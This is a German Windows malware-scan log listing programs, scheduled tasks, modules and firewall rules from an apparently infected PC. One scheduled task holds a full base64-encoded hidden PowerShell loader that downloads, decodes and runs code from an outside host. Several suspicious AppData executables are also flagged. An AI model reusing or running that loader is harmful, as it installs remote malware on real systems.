Sony PC Companion 2.10.228 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.228 - Sony)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TeamSpeak 3 Client (HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.42849 - TeamViewer)
Unity Web Player (HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\UnityWebPlayer) (Version: 5.0.3f2 - Unity Technologies ApS)
Unlocker 1.9.1-x64 (HKLM\...\Unlocker) (Version: 1.9.1 - Cedrick Collomb)
VLC media player 2.0.7 (HKLM\...\VLC media player) (Version: 2.0.7 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 4.20 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-1539430812-113463742-2149372525-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll => Keine Datei
==================== Wiederherstellungspunkte =========================
13-12-2015 19:00:24 Windows-Sicherung
19-12-2015 22:02:37 DirectX wurde installiert
20-12-2015 20:38:23 Windows-Sicherung
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2009-07-14 03:34 - 2015-12-22 00:21 - 00000870 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {2F9EFD6F-C190-4C5F-91E4-8DC29081871B} - System32\Tasks\{1E300C01-90FD-450F-BD1E-62BCCA98B390} => Firefox.exe hxxp://ui.skype.com/ui/0/7.0.0.102/de/abandoninstall?source=lightinstaller&page=tsBing
Task: {37CB84A8-AF35-4644-BC84-4A252074B883} - System32\Tasks\{DB07113B-F9D0-4E65-8E56-D804EE5D12B8} => pcalua.exe -a C:\Users\Özkan\Downloads\Setup_Lugiiis_Keybinder.exe -d C:\Users\Özkan\Downloads
Task: {5092819E-84BA-4BC9-869E-FAB88E5A99C3} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)
Task: {5EBFB1F8-88B5-4AEB-9E89-26746BE7A02D} - System32\Tasks\{28325A84-A9DE-5181-98DC-72E8BE19248C} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGwAaQBrAGUAcgB1AHQALgBpAG4AZgBvAC8AdQAvAD8AcQA9AFAAbQBXAHoAQQB2AHYAeABfAGMAcABFAHkAZQA4AFoAUQBPAFcARgBIAHkAUABKAFgAcgBRAHkALQBLAGQAZgB4AG8AUwB6AEsAcABwADkAWQBsAGcAcgBpAEsASQBrAGgAaQBqAG0AYwBIAGkAawBpAHQAWgA5ADEAcQBZAGUAcwA3ADIAWgBwADQAXwBUAFgAMQBZAEEAQgBNAEgAYwBUAHkASQBVAGwAMwBUAEUAcABOAGoALQB3AE4AZwByAGIARgBJAE4ARwB5ADkAUQBPADcAVAA5ADMASQBkAG8AMQBoAHIARgBoADgANgBSAGIAdQBLAEkAZwA3AFMAUgBnAGgAYgBaAHcATQBsAE4ATAByAHgAZQBPAFkASAAzAEoAUgBQAF8ARQBFADEAVQBNADQAZABIAHcASABFAGoAcgBMAEoAYQBRAGMASwBhAEoAdQBiADEAaQBtADAAVQBrAEEAcABDAFoAawBhAHoAcABwAHcATQBnAHIAVQAzAEQASgBFAHoAZwBEADgAegAtAEMAUQAzADQAbwBlAGsAbAB4AFEATABsAGsALQBvADEAVgBOADUAOQBJAEEAZQBhAHkAcgBaAFEAUAB4AG4ASgBXAHEAZQA3ADgAUABfAGEATQBBAFcAeABrAGsAdwBXAFcANwBDAE4ASwB5AFAARABOAHkAaQBDADQATAB1ADkAbgBVADUARQBYAGIAdwBnAHcAUgBHAEkASABNAEYAOABrAGEASQBCAEwARgBlAGYAeABCAEIAawBCADEAWQBUADIASwBoAFoANQBHAHcAMwBnAF8AVQA2AFAAcAB0ADUAOQBxAFAANQBXAEsAagBsAEwAQQAzADIATAA1AE0ANABHADkAawA4AHUARwB2ADMAOQBTAHMAaABCADUAUABnAHkANQB5AGQANQBQAHMAaQBJAFUATgBHADgASAAwAEoAbgBIADEASgBNAGIAbABCAGIAUwB4AGwANQBVAHQATgBWAEgASAB0ADcAVAB1AEsAZgBlAGMAUABHAE8ANgBMAEYAYgBXAC0AbwA2ADYAcQB5AFUATwAxADgAcABRAEIASwBNAHoAawBOAHEAeAB4AEYAcgBXAE4AYwBSAGUAUQBuAEQAcwBsADYANwBkADEATQBwAHYAWgBNAEwAOABFAHAAMgBiAEwAYQBHAHQAcAA0AG4AZgB2AGkAMQBvAEQAOQBZAFcATgAzAFUAJgBjAD0ASwA1AHkARAB0AEoASgBqAGsAZwBGAEMATwAyAFcAcQBJAEsARwBLAEoAZgBsAGwAZwBoAFIAdgBNAFgANQA2AEgAcQBSAHAAMgAyAFAARwB4AFIARQA3AHEAYgBzAEMAVABFAHgAUwBvAG0AQgBnADUAZwBjAFgAUwByADQAZQBVAFQASABfAE8AQgBiAFIAMQAtAGcAeQAxAEsAUQBoAFgANwAzAGkAaABTAEIAXwB2AEEAXwBJAEgAdwB3ADYANABQAHIAVQBMADQAbABWAEIAcABEAFYAWAAzAFgAagBmAHIAUgA0ADkAQwBJAGEAOQBoADEAdgBHAFQAWABHADUAOQBYAEsAaQBQAF8AcwAzAFIAcgB5AG8AZgBpAEYASQBSAE4ATwBZAHIAMABmAFkANQBoAEYAbAAxAF8ATQBJAFgAdgBCAC0AZgA0AFAASQA5ADEAbQBnAGMAaQBpAEIAVgA4ADQAcQBOAEMAQwBsAFQAZwBWAHgAYQBoAC0AegBHAHcAcgBqAEsAYwBHADYAOQBKAFMASgBMAC0AbwBFAGMAdQBsAGcANwBDADEANQBFAFkAUABqAGwANwBNADEAcwBkAGcAcwBDAFIAawBYAFgAWQBLAHAARQBZAFkAcQBZAHIAVQB2AEgAaQB1AFQAaABtAHcAcQBtADcASgBfAHEASgA3AG8AZgBjAG4ANQA2AHEAaABTAHEAeAB0AGoAbQBfAHgAYwBQAHQAYQBXAHMASQB0ADIANgBvAHQATABiADYALQBYAHEAeQB4AF8ARwBtAHUAcQBVAGQASQB6AGIAegAyADQASQAyAHIAQgBnADgAdABJAGgAdABmAFkASQBCAEEAZgAwAFUAbABfAEgAYwBmAGMAbABsAEQAeABIAG8AZQA5AGwATABxADMAaABjAGMARAB6AFUAcwBzAEUAZAA2AEEARAByAHkAMQBBAEcAUQBIADAAbgB1AFIAZQBGAEwAQwAzAFgAMgBKAE4AMAAyAHYANwBaAG0AbABVAEUAdABpAEQARQBuAEwAWABFAFAAMABXAGgAdAA1AHgAdwB0AFMATABSAG8AUwAwAG0ATwBtAGgANAA2AE8ANwBXAHUAdwBZAHYAZAB5AGgAcgByADIAcwBKAEsAVwBrAFYAWABlADkAUABHAFIAeABtAG0AXwA2AEsASQBUAFkANAB2AEQAUQBqAFUAdAAyADYARQAzADMAdgBTAE4AbgBNAE8AUQBQAGQAZQBSAHYAQQB1ADQAYgBzAG8ANQBuAEIAOAAwAGYAOQBlADcAXwBZAGoAVABnAG8AUAByAGYATQBLAHQASwBxAGgAZQBtAFQAawAxAEoAWABEAEsANQBVAGsAMABDAHoATAB3ADYAQQB4AHQAMwBMAFYASQAzAHQANABJAGsARgB0AHkASwBEAHAANAAzAFEARwBSADEAQQBwADIAUABnAEcAMwBvAFUAZgBfADgAOQBfAHYAZgBoAGsATABxAFIAQQBVAE8AMQA1ADEAYQBWADgAWQBLAFIASgAtAEQAQQBsAE8AbQB4AEIAVQB5AFYAQwBUAGkAcQA1AHQAbAAxADAAdwBIAHcAOABHAGoAawBGAHIAbgBSAEQAZABLAGwARwBSAFAAdwBQAGkAUQBrAGEAYQBQADkAVQBGAEQAcgA0AEcAMwBEAEYAdQB2AFIAaAA4ADkASgBpAFoAQwB4AGEAQwBhAEcAdQAzADMAWQBxAEYAXwAtAHQAYwBpAFYAVQBnAGcARwBVADkAdABOAHoAdwB0ADkAJgByAD0AMQA2ADQAMwAwADAAOQAzADAAOQA4ADcAMwA3ADgANQAxADMANAAiADsAJABzAHQAcwBrAD0AIgB7ADIAOAAzADIANQBBADgANAAtAEEAOQBEAEUALQA1ADEAOAAxAC0AOQA4AEQAQwAtADcAMgBFADgAQgBFADEAOQAyADQAOABDAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {6547E57D-4808-40FB-9FA9-C1A592A6F982} - System32\Tasks\{BA18FF5F-EC80-4F08-B6A5-67790B43475D} => pcalua.exe -a "C:\Program Files (x86)\Plus-HD-5.0\Uninstall.exe" -c /fromcontrolpanel=1
Task: {6C3547A8-0D1D-4FDE-AEBA-6176B3E9FCD5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {8FB4BCDC-484E-4E5D-8A4F-4624732C64C5} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {9CDF866B-9C28-4409-A728-713E5A1BEA5A} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {9FCCD376-FC5D-448B-849A-79A2205FF57C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-07-22] (Piriform Ltd)
Task: {A04598EA-0499-4F37-9782-5B24163322DF} - \Plus-HD-5.0-codedownloader -> Keine Datei <==== ACHTUNG
Task: {A0968CD4-D421-49DB-9263-225E4A391C1C} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2015-12-15] (AVAST Software)
Task: {ACFF0C35-B6D7-4F3E-B0F0-613FC3D60A40} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {D97022AC-E5C8-4C9A-AD06-69969C655663} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {DD46DE76-7339-48AB-8295-84A25F09A341} - System32\Tasks\gg_uac_daemon_Özkan => C:\Users\Özkan\Documents\my games\PB\gamedata\ggdllhost.exe
Task: {DEDEDC1E-CAA1-43C4-B91B-2464B34057A5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-09] (Adobe Systems Incorporated)
Task: {FA896F4F-A556-4D46-9FA7-07A5D8BE02BF} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\KYG1QOVT.job => C:\Users\�zkan\AppData\Roaming\KYG1QOVT.exe <==== ACHTUNG
Task: C:\Windows\Tasks\lm6V3l7.job => C:\Users\�zkan\AppData\Roaming\lm6V3l7.exe <==== ACHTUNG
Task: C:\Windows\Tasks\QiQMvbuugirF3MbSxPFk0Y.job => C:\Users\�zkan\AppData\Roaming\QiQMvbuugirF3MbSxPFk0Y.exe <==== ACHTUNG
Task: C:\Windows\Tasks\rmMkisrweHV4RuaBdLxOYzzbuC5.job => C:\Users\�zkan\AppData\Roaming\rmMkisrweHV4RuaBdLxOYzzbuC5.exe <==== ACHTUNG
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2015-09-11 18:02 - 2015-09-11 18:02 - 00803488 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2013-07-29 19:38 - 2012-03-27 01:33 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-10-18 15:40 - 2014-10-18 15:40 - 00172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\1eeea3ab8d69ec722bdcb28b8eb8dd75\IsdiInterop.ni.dll
2013-07-29 19:34 - 2012-02-01 15:25 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2013-07-29 19:51 - 2012-02-08 02:39 - 01198872 ____R () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
2015-12-18 19:40 - 2015-11-10 20:55 - 00778752 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-12-18 19:40 - 2015-07-03 17:12 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-12-18 19:40 - 2015-07-03 17:12 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-12-18 19:40 - 2015-07-03 17:12 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2015-12-18 19:40 - 2015-12-14 21:01 - 02547280 _____ () C:\Program Files (x86)\Steam\video.dll
2015-12-18 19:40 - 2015-09-24 01:33 - 02549248 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2015-12-18 19:40 - 2015-09-24 01:33 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2015-12-18 19:40 - 2015-09-24 01:33 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2015-12-18 19:40 - 2015-09-24 01:33 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2015-12-18 19:40 - 2015-09-24 01:33 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2015-12-18 19:40 - 2015-12-14 21:01 - 00804432 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2015-12-18 19:40 - 2015-11-03 23:00 - 00201728 _____ () C:\Program Files (x86)\Steam\bin\openvr_api.dll
2015-12-18 19:40 - 2015-11-17 01:31 - 47846176 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2015-12-18 19:40 - 2015-09-25 00:56 - 00119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
AlternateDataStreams: C:\ProgramData:NT
AlternateDataStreams: C:\ProgramData:NT2
AlternateDataStreams: C:\Users\All Users:NT
AlternateDataStreams: C:\Users\All Users:NT2
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2
AlternateDataStreams: C:\ProgramData\Application Data:NT
AlternateDataStreams: C:\ProgramData\Application Data:NT2
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2
AlternateDataStreams: C:\Users\Özkan\Anwendungsdaten:NT
AlternateDataStreams: C:\Users\Özkan\Anwendungsdaten:NT2
AlternateDataStreams: C:\Users\Özkan\AppData\Roaming:NT
AlternateDataStreams: C:\Users\Özkan\AppData\Roaming:NT2
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 80.69.100.212 - 80.69.100.205
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
MSCONFIG\startupreg: FlashPlayerUpdate => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_152_Plugin.exe -update plugin
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{0C8F46B7-5D5F-431E-ADA8-8C17F61322AB}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [{E7350369-DD38-419A-A7AF-738A7A50CDBC}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [TCP Query User{21455C06-6716-43BB-B154-3F07883EB7B7}C:\windows\syswow64\javaw.exe] => (Allow) C:\windows\syswow64\javaw.exe
FirewallRules: [UDP Query User{F2CA4BCA-A699-4C84-ABE1-D89C204D6ABD}C:\windows\syswow64\javaw.exe] => (Allow) C:\windows\syswow64\javaw.exe
FirewallRules: [TCP Query User{21B1FB1D-2CBC-4F19-81F1-C5D31357AD35}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{F7DE5662-1CF5-4B3B-BD74-2EB8428174E5}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [{DEB02161-3321-47A0-AEA7-B2383C6BA060}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{FB4E551E-3204-49F0-B2E0-CB812EE3A090}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6A2AD480-2EC5-4D0D-8CB4-7039D1BBB43E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{8651B310-EA93-453B-AD4F-40F2F79E12F0}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{908DEC77-2B49-4353-9F1D-67741687723B}] => (Allow) C:\Users\Ízkan\AppData\Roaming\Allmyapps\Allmyapps.exe
FirewallRules: [{BC440707-1268-4FE6-8896-03C83B5CFA5A}] => (Allow) LPort=80
FirewallRules: [{7C191149-D60C-454F-BB4A-F7265ACB46CF}] => (Allow) LPort=443
FirewallRules: [{96971A66-F6FB-41DF-821C-21A0F7C12744}] => (Allow) LPort=20010
FirewallRules: [{E9BB6E6B-67B0-45E3-8623-49821FF5A323}] => (Allow) LPort=3478
FirewallRules: [{A4796F1F-3471-40D3-82D3-67944C8F43DE}] => (Allow) LPort=7850
FirewallRules: [{38C3ED5B-5D9E-45AE-A2AC-2207C39E6DA2}] => (Allow) LPort=7852
FirewallRules: [{1CB0A71B-E2AE-43F6-97D1-91A6597BB8DB}] => (Allow) LPort=7853
FirewallRules: [{05C3202C-A18B-442D-A41A-6A7E5A065476}] => (Allow) LPort=27022
FirewallRules: [{F2027DFF-A0EE-4864-AFDA-5CC65BF9DCCF}] => (Allow) LPort=6881
FirewallRules: [{9F9F40DE-AE70-402C-8933-01A2A8BBE4F0}] => (Allow) LPort=33333
FirewallRules: [{DE71CD73-ADBE-4568-B562-DF04FE72D7AF}] => (Allow) LPort=20443
FirewallRules: [{164E1F9E-F18B-426F-9465-FCACC259547D}] => (Allow) LPort=8090
